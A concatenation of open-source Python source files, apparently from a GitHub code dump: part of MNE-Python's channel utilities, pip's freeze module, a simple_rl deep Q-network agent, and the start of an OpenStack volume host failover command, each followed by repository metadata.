            e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
            that takes and returns a string (new in version 0.10.0).
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        # Delegates to the module-level rename_channels helper.
        rename_channels(self.info, mapping)
    def set_montage(self, montage):
        """Set EEG sensor configuration
        Parameters
        ----------
        montage : instance of Montage or DigMontage
        Notes
        -----
        Operates in place.
        .. versionadded:: 0.9.0
        """
        # Imported here to avoid a circular import at module load time.
        from .montage import _set_montage
        _set_montage(self.info, montage)
class UpdateChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs, AverageTFR
"""
def pick_types(self, meg=True, eeg=False, stim=False, eog=False,
ecg=False, emg=False, ref_meg='auto', misc=False,
resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=False, include=[], exclude='bads', selection=None,
copy=False):
"""Pick some channels by type and names
Parameters
----------
meg : bool | str
If True include all MEG channels. If False include None
If string it can be 'mag', 'grad', 'planar1' or 'planar2' to select
only magnetometers, all gradiometers, or a specific type of
gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg: bool | str
If True include CTF / 4D reference channels. If 'auto', the
reference channels are only included if compensations are present.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
include : list of string
List of additional channels to include. If empty do not include
any.
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of string
Restrict sensor channels (MEG, EEG) to this list of channel names.
copy : bool
If True, returns new instance. Else, modifies in place. Defaults to
False.
Notes
-----
.. versionadded:: 0.9.0
"""
inst = self.copy() if copy else self
idx = pick_types(
self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
ias=ias, syst=syst, seeg=seeg, include=include, exclude=exclude,
selection=selection)
inst._pick_drop_channels(idx)
return inst
def pick_channels(self, ch_names, copy=False):
"""Pick some channels
Parameters
----------
ch_names : list
The list of channels to select.
copy : bool
If True, returns new instance. Else, modifies in place. Defaults to
False.
See Also
--------
drop_channels
Notes
-----
.. versionadded:: 0.9.0
"""
inst = self.copy() if copy else self
_check_excludes_includes(ch_names)
idx = [inst.ch_names.index(c) for c in ch_names if c in inst.ch_names]
inst._pick_drop_channels(idx)
return inst
def drop_channels(self, ch_names, copy=False):
"""Drop some channels
Parameters
----------
ch_names : list
The list of channels to remove.
copy : bool
If True, returns new instance. Else, modifies in place. Defaults to
False.
See Also
--------
pick_channels
Notes
-----
.. versionadded:: 0.9.0
"""
inst = self.copy() if copy else self
bad_idx = [inst.ch_names.index(c) for c in ch_names
if c in inst.ch_names]
idx = np.setdiff1d(np.arange(len(inst.ch_names)), bad_idx)
inst._pick_drop_channels(idx)
return inst
    def _pick_drop_channels(self, idx):
        """Keep only the channels at positions ``idx`` (in that order),
        updating the data array and all channel-indexed metadata in place."""
        # avoid circular imports
        from ..io.base import _BaseRaw
        from ..epochs import _BaseEpochs
        from ..evoked import Evoked
        from ..time_frequency import AverageTFR
        if isinstance(self, (_BaseRaw, _BaseEpochs)):
            if not self.preload:
                raise RuntimeError('If Raw or Epochs, data must be preloaded '
                                   'to drop or pick channels')
        def inst_has(attr):
            # True only when the attribute exists AND is non-None.
            return getattr(self, attr, None) is not None
        if inst_has('picks'):
            self.picks = self.picks[idx]
        if inst_has('_cals'):
            self._cals = self._cals[idx]
        self.info = pick_info(self.info, idx, copy=False)
        if inst_has('_projector'):
            # Projection matrix is channels x channels: subset rows and cols.
            self._projector = self._projector[idx][:, idx]
        # Channel axis differs by type — presumably axis 0 for Raw
        # (channels x times) and axis 1 for Epochs
        # (epochs x channels x times); TODO confirm against data layout.
        if isinstance(self, _BaseRaw) and inst_has('_data'):
            self._data = self._data.take(idx, axis=0)
        elif isinstance(self, _BaseEpochs) and inst_has('_data'):
            self._data = self._data.take(idx, axis=1)
        elif isinstance(self, AverageTFR) and inst_has('data'):
            self.data = self.data.take(idx, axis=0)
        elif isinstance(self, Evoked):
            self.data = self.data.take(idx, axis=0)
    def add_channels(self, add_list, copy=False):
        """Append new channels to the instance.
        Parameters
        ----------
        add_list : list
            A list of objects to append to self. Must contain all the same
            type as the current object
        copy : bool
            Whether to return a new instance or modify in place
        Returns
        -------
        out : MNE object of type(self)
            An object with new channels appended (will be the same
            object if copy==False)
        """
        # avoid circular imports
        from ..io.base import _BaseRaw
        from ..epochs import _BaseEpochs
        from ..io.meas_info import _merge_info
        if not isinstance(add_list, (list, tuple)):
            raise AssertionError('Input must be a list or tuple of objs')
        # Object-specific checks
        if isinstance(self, (_BaseRaw, _BaseEpochs)):
            if not all([inst.preload for inst in add_list] + [self.preload]):
                raise AssertionError('All data must be preloaded')
            # Raw concatenates on axis 0, Epochs on axis 1 (the channel axis
            # for each type — see _pick_drop_channels).
            data_name = '_data'
            if isinstance(self, _BaseRaw):
                con_axis = 0
                comp_class = _BaseRaw
            elif isinstance(self, _BaseEpochs):
                con_axis = 1
                comp_class = _BaseEpochs
        else:
            data_name = 'data'
            con_axis = 0
            comp_class = type(self)
        if not all(isinstance(inst, comp_class) for inst in add_list):
            raise AssertionError('All input data must be of same type')
        data = [getattr(self, data_name)] + [getattr(inst, data_name)
                                             for inst in add_list]
        # Make sure that all dimensions other than channel axis are the same
        compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
        shapes = np.array([dat.shape for dat in data])[:, compare_axes]
        if not ((shapes[0] - shapes) == 0).all():
            raise AssertionError('All dimensions except channels must match')
        # Create final data / info objects
        data = np.concatenate(data, axis=con_axis)
        infos = [self.info] + [inst.info for inst in add_list]
        new_info = _merge_info(infos)
        # Now update the attributes
        if copy is True:
            out = self.copy()
        else:
            out = self
        setattr(out, data_name, data)
        out.info = new_info
        return out
class InterpolationMixin(object):
    """Mixin class for Raw, Evoked, Epochs
    """
    def interpolate_bads(self, reset_bads=True, mode='accurate'):
        """Interpolate bad MEG and EEG channels.
        Operates in place.
        Parameters
        ----------
        reset_bads : bool
            If True, remove the bads from info.
        mode : str
            Either `'accurate'` or `'fast'`, determines the quality of the
            Legendre polynomial expansion used for interpolation of MEG
            channels.
        Returns
        -------
        self : mne.io.Raw, mne.Epochs or mne.Evoked
            The interpolated data.
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        from .interpolation import _interpolate_bads_eeg, _interpolate_bads_meg
        # `is False` rather than truthiness: types without a `preload`
        # attribute (getattr returns None) are allowed through; only an
        # explicitly-unloaded instance is rejected.
        if getattr(self, 'preload', None) is False:
            raise ValueError('Data must be preloaded.')
        _interpolate_bads_eeg(self)
        _interpolate_bads_meg(self, mode=mode)
        if reset_bads is True:
            self.info['bads'] = []
        return self
def rename_channels(info, mapping):
    """Rename channels.
    Parameters
    ----------
    info : dict
        Measurement info.
    mapping : dict | callable
        a dictionary mapping the old channel to a new channel name
        e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
        that takes and returns a string (new in version 0.10.0).
    """
    info._check_consistency()
    bads = list(info['bads'])  # make our own local copies
    ch_names = list(info['ch_names'])
    # first check and assemble clean mappings of index and name
    if isinstance(mapping, dict):
        orig_names = sorted(list(mapping.keys()))
        missing = [orig_name not in ch_names for orig_name in orig_names]
        if any(missing):
            raise ValueError("Channel name(s) in mapping missing from info: "
                             "%s" % np.array(orig_names)[np.array(missing)])
        new_names = [(ch_names.index(ch_name), new_name)
                     for ch_name, new_name in mapping.items()]
    elif callable(mapping):
        # A callable is applied to every channel name.
        new_names = [(ci, mapping(ch_name))
                     for ci, ch_name in enumerate(ch_names)]
    else:
        raise ValueError('mapping must be callable or dict, not %s'
                         % (type(mapping),))
    # check we got all strings out of the mapping
    if any(not isinstance(new_name[1], string_types)
           for new_name in new_names):
        raise ValueError('New channel mapping must only be to strings')
    # do the remapping locally (bads must be renamed in lockstep so the
    # bads list still refers to valid channel names afterwards)
    for c_ind, new_name in new_names:
        for bi, bad in enumerate(bads):
            if bad == ch_names[c_ind]:
                bads[bi] = new_name
        ch_names[c_ind] = new_name
    # check that all the channel names are unique
    if len(ch_names) != len(np.unique(ch_names)):
        raise ValueError('New channel names are not unique, renaming failed')
    # do the remapping in info
    info['bads'] = bads
    info['ch_names'] = ch_names
    for ch, ch_name in zip(info['chs'], ch_names):
        ch['ch_name'] = ch_name
    info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Helper to unpack mat files in Python"""
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
def read_ch_connectivity(fname, picks=None):
    """Parse FieldTrip neighbors .mat file
    More information on these neighbor definitions can be found on the
    related FieldTrip documentation pages:
    http://fieldtrip.fcdonders.nl/template/neighbours
    Parameters
    ----------
    fname : str
        The file name. Example: 'neuromag306mag', 'neuromag306planar',
        'ctf275', 'biosemi64', etc.
    picks : array-like of int, shape (n_channels,)
        The indices of the channels to include. Must match the template.
        Defaults to None.
    Returns
    -------
    ch_connectivity : scipy.sparse matrix
        The connectivity matrix.
    ch_names : list
        The list of channel names present in connectivity matrix.
    """
    from scipy.io import loadmat
    if not op.isabs(fname):
        # A bare template name is resolved against the bundled templates
        # directory, with or without the '_neighb.mat' suffix.
        templates_dir = op.realpath(op.join(op.dirname(__file__),
                                            'data', 'neighbors'))
        templates = os.listdir(templates_dir)
        for f in templates:
            if f == fname:
                break
            if f == fname + '_neighb.mat':
                fname += '_neighb.mat'
                break
        else:
            # for/else: runs only when no template matched (no break).
            raise ValueError('I do not know about this neighbor '
                             'template: "{}"'.format(fname))
        fname = op.join(templates_dir, fname)
    nb = loadmat(fname)['neighbours']
    ch_names = _recursive_flatten(nb['label'], string_types)
    neighbors = [_recursive_flatten(c, string_types) for c in
                 nb['neighblabel'].flatten()]
    assert len(ch_names) == len(neighbors)
    if picks is not None:
        if max(picks) >= len(ch_names):
            raise ValueError('The picks must be compatible with '
                             'channels. Found a pick ({}) which exceeds '
                             'the channel range ({})'
                             .format(max(picks), len(ch_names)))
    connectivity = _ch_neighbor_connectivity(ch_names, neighbors)
    if picks is not None:
        # picking before constructing matrix is buggy
        connectivity = connectivity[picks][:, picks]
        ch_names = [ch_names[p] for p in picks]
    return connectivity, ch_names
def _ch_neighbor_connectivity(ch_names, neighbors):
    """Compute sensor connectivity matrix

    Parameters
    ----------
    ch_names : list of str
        The channel names.
    neighbors : list of list
        A list of list of channel names. The neighbors to
        which the channels in ch_names are connected with.
        Must be of the same length as ch_names.

    Returns
    -------
    ch_connectivity : scipy.sparse matrix
        The connectivity matrix.

    Raises
    ------
    ValueError
        If the lengths mismatch, if some channel has no neighbor entry, or
        if ``neighbors`` is not a list of lists of str.
    """
    if len(ch_names) != len(neighbors):
        raise ValueError('`ch_names` and `neighbors` must '
                         'have the same length')
    set_neighbors = set([c for d in neighbors for c in d])
    rest = set(ch_names) - set_neighbors
    if len(rest) > 0:
        raise ValueError('Some of your neighbors are not present in the '
                         'list of channel names')
    for neigh in neighbors:
        # BUG FIX: the original combined these checks with `and`, so an
        # entry that failed only one of the two conditions (e.g. a plain
        # string, whose characters are all str) slipped through the
        # validation. Either violation must raise.
        if (not isinstance(neigh, list) or
                not all(isinstance(c, string_types) for c in neigh)):
            raise ValueError('`neighbors` must be a list of lists of str')
    # Start from the identity so every channel is connected to itself.
    ch_connectivity = np.eye(len(ch_names), dtype=bool)
    for ii, neigbs in enumerate(neighbors):
        ch_connectivity[ii, [ch_names.index(i) for i in neigbs]] = True
    ch_connectivity = sparse.csr_matrix(ch_connectivity)
    return ch_connectivity
| {
"content_hash": "3fbe9bace69339c686ce39efde68a68e",
"timestamp": "",
"source": "github",
"line_count": 736,
"max_line_length": 79,
"avg_line_length": 35.30434782608695,
"alnum_prop": 0.5447583128078818,
"repo_name": "andyh616/mne-python",
"id": "180bfffd24ed110cee84c64aa9c8c9f2c36668c7",
"size": "26294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mne/channels/channels.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "3117"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "4245296"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import collections
import logging
import os
import re
import warnings
from pip._vendor import pkg_resources, six
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.pkg_resources import RequirementParseError
from pip._internal.exceptions import InstallationError
from pip._internal.req import InstallRequirement
from pip._internal.req.req_file import COMMENT_RE
from pip._internal.utils.deprecation import RemovedInPip11Warning
from pip._internal.utils.misc import (
dist_is_editable, get_installed_distributions,
)
logger = logging.getLogger(__name__)
def freeze(
        requirement=None,
        find_links=None, local_only=None, user_only=None, skip_regex=None,
        isolated=False,
        wheel_cache=None,
        exclude_editable=False,
        skip=()):
    """Yield the lines of a ``pip freeze``-style requirements listing.

    When ``requirement`` (an iterable of requirements-file paths) is given,
    lines are emitted following the structure of those files first, and any
    remaining installed distributions are appended at the end under a
    '## The following requirements were added by pip freeze:' header.
    """
    find_links = find_links or []
    skip_match = None
    if skip_regex:
        skip_match = re.compile(skip_regex).search
    # Collect dependency links from installed dists and explicit find-links.
    dependency_links = []
    for dist in pkg_resources.working_set:
        if dist.has_metadata('dependency_links.txt'):
            dependency_links.extend(
                dist.get_metadata_lines('dependency_links.txt')
            )
    for link in find_links:
        if '#egg=' in link:
            dependency_links.append(link)
    for link in find_links:
        yield '-f %s' % link
    # Map of project name -> FrozenRequirement for everything installed.
    installations = {}
    for dist in get_installed_distributions(local_only=local_only,
                                            skip=(),
                                            user_only=user_only):
        try:
            req = FrozenRequirement.from_dist(
                dist,
                dependency_links
            )
        except RequirementParseError:
            logger.warning(
                "Could not parse requirement: %s",
                dist.project_name
            )
            continue
        if exclude_editable and req.editable:
            continue
        installations[req.name] = req
    if requirement:
        # the options that don't get turned into an InstallRequirement
        # should only be emitted once, even if the same option is in multiple
        # requirements files, so we need to keep track of what has been emitted
        # so that we don't emit it again if it's seen again
        emitted_options = set()
        # keep track of which files a requirement is in so that we can
        # give an accurate warning if a requirement appears multiple times.
        req_files = collections.defaultdict(list)
        for req_file_path in requirement:
            with open(req_file_path) as req_file:
                for line in req_file:
                    # Pass through blank lines, comments, and option lines
                    # (emitting each distinct option only once).
                    if (not line.strip() or
                            line.strip().startswith('#') or
                            (skip_match and skip_match(line)) or
                            line.startswith((
                                '-r', '--requirement',
                                '-Z', '--always-unzip',
                                '-f', '--find-links',
                                '-i', '--index-url',
                                '--pre',
                                '--trusted-host',
                                '--process-dependency-links',
                                '--extra-index-url'))):
                        line = line.rstrip()
                        if line not in emitted_options:
                            emitted_options.add(line)
                            yield line
                        continue
                    # Parse the requirement to learn its project name.
                    if line.startswith('-e') or line.startswith('--editable'):
                        if line.startswith('-e'):
                            line = line[2:].strip()
                        else:
                            line = line[len('--editable'):].strip().lstrip('=')
                        line_req = InstallRequirement.from_editable(
                            line,
                            isolated=isolated,
                            wheel_cache=wheel_cache,
                        )
                    else:
                        line_req = InstallRequirement.from_line(
                            COMMENT_RE.sub('', line).strip(),
                            isolated=isolated,
                            wheel_cache=wheel_cache,
                        )
                    if not line_req.name:
                        logger.info(
                            "Skipping line in requirement file [%s] because "
                            "it's not clear what it would install: %s",
                            req_file_path, line.strip(),
                        )
                        logger.info(
                            "  (add #egg=PackageName to the URL to avoid"
                            " this warning)"
                        )
                    elif line_req.name not in installations:
                        # either it's not installed, or it is installed
                        # but has been processed already
                        if not req_files[line_req.name]:
                            logger.warning(
                                "Requirement file [%s] contains %s, but that "
                                "package is not installed",
                                req_file_path,
                                COMMENT_RE.sub('', line).strip(),
                            )
                        else:
                            req_files[line_req.name].append(req_file_path)
                    else:
                        # Emit the installed version and mark it as handled.
                        yield str(installations[line_req.name]).rstrip()
                        del installations[line_req.name]
                        req_files[line_req.name].append(req_file_path)
        # Warn about requirements that were included multiple times (in a
        # single requirements file or in different requirements files).
        for name, files in six.iteritems(req_files):
            if len(files) > 1:
                logger.warning("Requirement %s included multiple times [%s]",
                               name, ', '.join(sorted(set(files))))
        yield(
            '## The following requirements were added by '
            'pip freeze:'
        )
    # Everything installed but not mentioned in any requirements file.
    for installation in sorted(
            installations.values(), key=lambda x: x.name.lower()):
        if canonicalize_name(installation.name) not in skip:
            yield str(installation).rstrip()
class FrozenRequirement(object):
    """An installed distribution rendered as a requirements-file line,
    possibly in editable (``-e``) form, with optional comment lines."""
    def __init__(self, name, req, editable, comments=()):
        self.name = name
        self.req = req
        self.editable = editable
        self.comments = comments
    # Patterns recognizing svn-style version suffixes: '-r<rev>' or a
    # date stamp '-20YYMMDD'.
    _rev_re = re.compile(r'-r(\d+)$')
    _date_re = re.compile(r'-(20\d\d\d\d\d\d)$')
    @classmethod
    def from_dist(cls, dist, dependency_links):
        """Build a FrozenRequirement from an installed distribution.

        Editable VCS checkouts are rendered from their source location;
        everything else falls back to the dist's own ``name==version``
        requirement.
        """
        location = os.path.normcase(os.path.abspath(dist.location))
        comments = []
        from pip._internal.vcs import vcs, get_src_requirement
        if dist_is_editable(dist) and vcs.get_backend_name(location):
            editable = True
            try:
                req = get_src_requirement(dist, location)
            except InstallationError as exc:
                logger.warning(
                    "Error when trying to get requirement for VCS system %s, "
                    "falling back to uneditable format", exc
                )
                req = None
            if req is None:
                logger.warning(
                    'Could not determine repository location of %s', location
                )
                comments.append(
                    '## !! Could not determine repository location'
                )
                req = dist.as_requirement()
                editable = False
        else:
            editable = False
            req = dist.as_requirement()
            specs = req.specs
            assert len(specs) == 1 and specs[0][0] in ["==", "==="], \
                'Expected 1 spec with == or ===; specs = %r; dist = %r' % \
                (specs, dist)
            version = specs[0][1]
            ver_match = cls._rev_re.search(version)
            date_match = cls._date_re.search(version)
            # A revision/date suffix suggests an svn checkout installed as a
            # plain dist; try to recover the svn URL from dependency_links.
            if ver_match or date_match:
                svn_backend = vcs.get_backend('svn')
                if svn_backend:
                    svn_location = svn_backend().get_location(
                        dist,
                        dependency_links,
                    )
                # NOTE(review): svn_location is unbound here if no svn
                # backend is registered — confirm that case cannot occur.
                if not svn_location:
                    logger.warning(
                        'Warning: cannot find svn location for %s', req,
                    )
                    comments.append(
                        '## FIXME: could not find svn URL in dependency_links '
                        'for this package:'
                    )
                else:
                    warnings.warn(
                        "SVN editable detection based on dependency links "
                        "will be dropped in the future.",
                        RemovedInPip11Warning,
                    )
                    comments.append(
                        '# Installing as editable to satisfy requirement %s:' %
                        req
                    )
                    if ver_match:
                        rev = ver_match.group(1)
                    else:
                        rev = '{%s}' % date_match.group(1)
                    editable = True
                    req = '%s@%s#egg=%s' % (
                        svn_location,
                        rev,
                        cls.egg_name(dist)
                    )
        return cls(dist.project_name, req, editable, comments)
    @staticmethod
    def egg_name(dist):
        # Strip the trailing '-pyX.Y' tag from the egg name, if present.
        name = dist.egg_name()
        match = re.search(r'-py\d\.\d$', name)
        if match:
            name = name[:match.start()]
        return name
    def __str__(self):
        # Comment lines first, then the (possibly '-e'-prefixed) requirement.
        req = self.req
        if self.editable:
            req = '-e %s' % req
        return '\n'.join(list(self.comments) + [str(req)]) + '\n'
| {
"content_hash": "55d44c880152e10f406cbc93c1cefdd5",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 79,
"avg_line_length": 39.78174603174603,
"alnum_prop": 0.4682294264339152,
"repo_name": "Microsoft/PTVS",
"id": "b6821c0e7eff728787beafdb016760c6ecee5b55",
"size": "10025",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/pip/_internal/operations/freeze.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "109"
},
{
"name": "Batchfile",
"bytes": "10898"
},
{
"name": "C",
"bytes": "23236"
},
{
"name": "C#",
"bytes": "12235396"
},
{
"name": "C++",
"bytes": "212001"
},
{
"name": "CSS",
"bytes": "7025"
},
{
"name": "HTML",
"bytes": "34251"
},
{
"name": "JavaScript",
"bytes": "87257"
},
{
"name": "PowerShell",
"bytes": "44322"
},
{
"name": "Python",
"bytes": "847130"
},
{
"name": "Rich Text Format",
"bytes": "260880"
},
{
"name": "Smarty",
"bytes": "8156"
},
{
"name": "Tcl",
"bytes": "24968"
}
],
"symlink_target": ""
} |
''' DQNAgentClass.py: Class for Deep Q-network agent. Built based on the network
in DeepMind, Multi-agent RL in Sequential Social Dilemmas paper. '''
# Python imports.
import tensorflow as tf
import numpy as np
import random
# Other imports.
from simple_rl.agents.AgentClass import Agent
class DQNAgent(Agent):
    """Deep Q-network agent using the TF1 graph/session API, with a separate
    target network that is softly updated toward the main network."""
    NAME = "dqn-deep-mind"
    def __init__(self, actions, name=NAME, learning_rate=1e-4, x_dim=210, y_dim=160, eps_start=1.0, eps_decay=0.0000001, eps_end=0.1, num_channels=3, should_train=True, from_checkpoint=None, player_id=1):
        Agent.__init__(self, name=name, actions=[])
        self.learning_rate = learning_rate
        self.x_dim, self.y_dim = x_dim, y_dim
        self.actions, self.num_actions = actions, len(actions)
        self.hidden_layers = [32, 32]
        self.num_channels = num_channels
        self.eps_start, self.epsilon_decay, self.epsilon_end = eps_start, eps_decay, eps_end
        self.should_train = should_train
        # Builds both Q-networks, the session, replay buffer, and saver.
        self.reset()
        # Parameters for updating target network.
        tau = 0.001
        # TODO: Update to support player_id > 2.
        # NOTE: This is a bit of a hack to update the variables in the target
        # network. It can be fixed by using scope and Tensorflow 1.4 which takes
        # a scope argument in tf.trainable_variables().
        if player_id == 2:
            vs = tf.trainable_variables()
            self.target_ops = update_target_graph(vs[len(vs)//2:], tau)
        else:
            self.target_ops = update_target_graph(tf.trainable_variables(), tau)
        # Load model from a checkpoint
        if not (from_checkpoint is None):
            self.saver.restore(self.sess, from_checkpoint)
            print('Restored model from checkpoint: {}'.format(from_checkpoint))
    def act(self, state, reward):
        '''Epsilon-greedy action selection; also performs a training step,
        replay-buffer update and (periodically) checkpointing.
        Args:
            state (simple_rl.State)
            reward (float)
        Returns:
            (str)
        '''
        # Training
        if self.should_train and self.total_steps > 0 and self.total_steps % self.update_freq == 0:
            s, a, r, s2, t = self.experience_buffer.sample(self.batch_size)
            targetVals = self.targetQN.predict_target(self.sess, s2)
            # Compute y-vals
            # NOTE(review): no discount factor is applied to the bootstrapped
            # target (implicitly gamma == 1) — confirm this is intended.
            y = np.zeros(self.batch_size)
            for i in range(self.batch_size):
                if t[i]:
                    y[i] = r[i]
                else:
                    y[i] = r[i] + targetVals[i]
            l = self.mainQN.train(self.sess, s, a, y)
            if self.print_loss and (self.total_steps % self.print_every == 0):
                print('Loss for step {}: {}'.format(self.total_steps, l))
            # Softly move the target network toward the main network.
            update_target(self.target_ops, self.sess)
        # Not Training (or after training)
        if random.random() < self.epsilon:
            action = np.random.choice(self.num_actions) # NOTE: Again assumes actions encoded as integers
        else:
            img = state.to_rgb(self.x_dim, self.y_dim)
            action = self.mainQN.get_best_action(self.sess, img)[0]
        # Store the (s, a, r, s', terminal) transition from the previous step.
        if not (self.prev_state is None) and not (self.prev_action is None):
            self.experience_buffer.add((self.prev_state, self.prev_action, reward, state.to_rgb(self.x_dim, self.y_dim), state.is_terminal()))
        self.prev_state, self.prev_action = state.to_rgb(self.x_dim, self.y_dim), action
        # Linear epsilon decay toward epsilon_end.
        if self.epsilon > self.epsilon_end:
            self.epsilon -= self.epsilon_decay
        # Saving checkpoints (NOTE: We only save checkpoints when training)
        if self.should_train and self.should_save and self.total_steps > 0 and self.total_steps % self.save_every == 0:
            save_path = self.saver.save(self.sess, '/tmp/{}.ckpt'.format(self.name))
            print('At step {}, saved model to {}'.format(self.total_steps, save_path))
        self.curr_step += 1
        self.total_steps += 1
        if state.is_terminal():
            self.curr_step = 0
            self.curr_episode += 1
        self.action_counts[action] += 1
        return self.actions[action]
    def __str__(self):
        return str(self.name)
    def reset(self):
        """(Re)build the networks, session, replay buffer and counters."""
        self.mainQN = QNetwork(learning_rate=self.learning_rate, num_actions=self.num_actions, x_dim=self.x_dim, y_dim=self.y_dim, num_channels=self.num_channels)
        self.targetQN = QNetwork(learning_rate=self.learning_rate, num_actions=self.num_actions, x_dim=self.x_dim, y_dim=self.y_dim, num_channels=self.num_channels)
        self.sess = tf.Session()
        self.experience_buffer = ExperienceBuffer(buffer_size=10e5)
        self.epsilon = self.eps_start
        self.prev_state, self.prev_action = None, None
        self.curr_step, self.total_steps = 0, 0
        self.curr_episode = 0
        self.update_freq = 100
        self.batch_size = 32
        self.update_target = 100
        self.should_save, self.save_every = True, 100000
        self.print_loss, self.print_every = True, 10000
        self.saver = tf.train.Saver()
        self.action_counts = np.zeros(self.num_actions)
        self.sess.run(tf.global_variables_initializer())
# --------------
# -- QNetwork --
# --------------
class QNetwork():
    """Fully-connected Q-value network over flattened RGB image input."""
    def __init__(self, learning_rate=1e-4, num_actions=8, x_dim=21, y_dim=16, num_channels=3):
        self.learning_rate = learning_rate
        self.num_channels = num_channels
        self.hidden_layers = [32, 32]
        self.num_actions = num_actions
        self.x_dim, self.y_dim = x_dim, y_dim
        self.num_channels = num_channels
        # Placeholders: image batch, TD targets, and taken-action indices.
        self.image = tf.placeholder(tf.float32, shape=[None, self.x_dim, self.y_dim, self.num_channels], name='image')
        self.targetQ = tf.placeholder(tf.float32, shape=[None], name='targetQ')
        self.actions = tf.placeholder(tf.int32, shape=[None], name='actions')
        self.out = self.setup_network(self.image)
        self.predict = tf.argmax(self.out, 1)
        self.loss_val = self.loss(self.out)
        self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss_val)
    def setup_network(self, inpt):
        """Flatten the image and pass it through ReLU dense layers; the
        final linear layer emits one Q-value per action."""
        flattened_input = tf.reshape(inpt, [-1, self.num_channels*self.x_dim*self.y_dim])
        curr_layer = flattened_input
        for i, layer_size in enumerate(self.hidden_layers):
            curr_layer = tf.layers.dense(curr_layer, units=layer_size, activation=tf.nn.relu)
        return tf.layers.dense(curr_layer, units=self.num_actions)
    def loss(self, output):
        """Mean squared error between targetQ and the taken action's Q."""
        actions_onehot = tf.one_hot(self.actions, self.num_actions, dtype=tf.float32)
        Q = tf.reduce_sum(actions_onehot * self.out, axis=1)
        return tf.reduce_mean(tf.square(self.targetQ - Q))
    def train(self, sess, s, a, y):
        """Run one optimization step; returns the scalar loss."""
        _, l = sess.run([self.train_op, self.loss_val], feed_dict={self.targetQ: y, self.image: s, self.actions: a})
        return l
    def predict_target(self, sess, states):
        """Return max_a Q(s, a) for each state in `states`."""
        vals = sess.run(self.out, feed_dict={self.image: states})
        return np.max(vals, axis=1)
    def get_best_action(self, sess, img):
        """Return the argmax action for a single image (batched as [img])."""
        return sess.run(self.predict, feed_dict={self.image: [img]})
# -----------------------
# -- Experience Buffer --
# -----------------------
class ExperienceBuffer():
    """Fixed-capacity FIFO replay buffer of (s, a, r, s', terminal) tuples."""
    def __init__(self, buffer_size=50000):
        self.buffer = []
        # Cast so float sizes (e.g. the caller's 10e5) still bound the buffer.
        self.buffer_size = int(buffer_size)
    def add(self, experience):
        """Append one transition, evicting the oldest entries when full."""
        # `>=` (not `==`) so the capacity invariant holds even if the buffer
        # somehow overshoots or buffer_size is reduced later.
        while len(self.buffer) >= self.buffer_size:
            self.buffer.pop(0)
        self.buffer.append(experience)
    def sample(self, size):
        """Uniformly sample `size` transitions (with replacement) and return
        them as five parallel lists: [s1, a, r, s2, t]."""
        indexes = np.random.randint(0, high=len(self.buffer), size=size)
        s1 = [self.buffer[index][0] for index in indexes]
        a = [self.buffer[index][1] for index in indexes]
        r = [self.buffer[index][2] for index in indexes]
        s2 = [self.buffer[index][3] for index in indexes]
        t = [self.buffer[index][4] for index in indexes]
        return [s1, a, r, s2, t]
# Used to update TF networks
def update_target_graph(tfVars, tau):
    """Build ops that softly blend each main-network variable (first half of
    tfVars) into its matching target-network variable (second half)."""
    half = len(tfVars) // 2
    ops = []
    for main_var, target_var in zip(tfVars[:half], tfVars[half:]):
        blended = main_var.value() * tau + (1 - tau) * target_var.value()
        ops.append(target_var.assign(blended))
    return ops
def update_target(op_holder, sess):
    """Execute every pending target-network update op in order."""
    for update_op in op_holder:
        sess.run(update_op)
| {
"content_hash": "6df7c0e307ec7ee69bc227fefde0de2c",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 205,
"avg_line_length": 39.70673076923077,
"alnum_prop": 0.6080639302579005,
"repo_name": "david-abel/simple_rl",
"id": "8a5e243f4c5c110538775c96c050d318ba57a7f8",
"size": "8259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simple_rl/agents/func_approx/DQNAgentClass.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "196326"
},
{
"name": "Python",
"bytes": "433150"
}
],
"symlink_target": ""
} |
"""Volume v2 host action implementations"""
from osc_lib.command import command
from openstackclient.i18n import _
class FailoverVolumeHost(command.Command):
    _description = _("Failover volume host to different backend")

    def get_parser(self, prog_name):
        # Build on the base command's parser, then add our two arguments.
        p = super(FailoverVolumeHost, self).get_parser(prog_name)
        p.add_argument(
            "host",
            metavar="<host-name>",
            help=_("Name of volume host"),
        )
        p.add_argument(
            "--volume-backend",
            metavar="<backend-id>",
            required=True,
            help=_("The ID of the volume backend replication "
                   "target where the host will failover to (required)"),
        )
        return p

    def take_action(self, parsed_args):
